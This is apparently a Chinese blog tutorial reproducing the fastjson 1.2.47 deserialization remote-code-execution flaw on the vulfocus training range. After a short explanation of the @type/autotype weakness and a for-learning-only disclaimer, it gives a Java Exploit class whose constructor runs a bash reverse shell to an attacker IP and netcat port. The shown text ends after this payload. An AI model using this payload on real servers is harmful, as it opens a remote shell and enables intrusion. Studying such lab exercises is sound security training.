【fastjson 1.2.47漏洞复现实战（vulfocus在线靶场CNVD-2017-02833）——关注紫灵小姐姐不踩坑】

漏洞描述

（网络并非法外之地，复现仅用于学习测试，万勿随意攻击）

Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象

fastjson在解析json的过程中,支持使用@type字段来指定反序列化的类型,并调用该类的set/get方法来访问属性,当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,

使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,即可构造出一些恶意利用链。

编写payload&编译

import java.lang.Runtime;
import java.lang.Process;

public class Exploit{

public Exploit(){

try{
Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/攻击机ip192.168.3.3/nc监听的端口60001  0>&1");
}catch(Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv){
Exploit e = new Exploit();

    }
}
<